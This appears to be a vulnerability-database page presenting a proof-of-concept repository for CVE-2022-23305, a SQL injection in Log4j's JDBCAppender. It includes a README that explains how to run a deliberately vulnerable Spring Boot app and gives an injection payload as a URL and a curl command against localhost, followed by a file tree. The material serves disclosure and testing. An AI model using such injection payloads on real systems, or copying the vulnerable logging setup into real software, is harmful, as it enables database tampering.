来源

关联漏洞

Description

CVE-2022-23305 Log4J JDBCAppender SQl injection POC 

介绍

# CVE-2022-23305 Log4j JDBCAppender sql injection POC

This is a very simple Spring Boot based application that demonstrates the CVE-2022-23305 vulnerability. It uses Apache Maven, Spring Boot, Spring MVC, and the H2 in-memory database to log one simple entry, taken as a URL query string parameter. Since Log4J is configured to use a JDBCAppender, it is vulnerable to SQL injection.

See src/main/java/poc/InjectionController.java for the logging statement.  
See src/main/resource folder for all the configuration files.

You can run the application using Java and Maven by running "mvn clean spring-boot:run".  
You can also run it as a Docker application such as:  
 docker build --tag log4j-poc .  
 docker run -p 8080:8080 log4j-poc  

The app will be available at http://localhost:8080/.  
To exploit the vulnerability, submit an injected sql statement as the parameter which is getting logged:  
 "http://localhost:8080/?param=');insert into logs values(':("  
The return will list the added log entries, containing one that was added by the sql injected into the parameter.  
To do the same with curl use:  
 curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('  

文件快照

 [4.0K]  /data/pocs/16d36d5240b2db6601d42cbc85b2e1cbd3b741d8
├── [ 160]  Dockerfile
├── [1.2K]  pom.xml
├── [1.2K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  poc
        │       ├── [ 332]  Application.java
        │       └── [1.2K]  InjectionController.java
        └── [4.0K]  resources
            ├── [ 185]  application.properties
            ├── [ 355]  log4j.properties
            └── [  76]  schema.sql

5 directories, 8 files

备注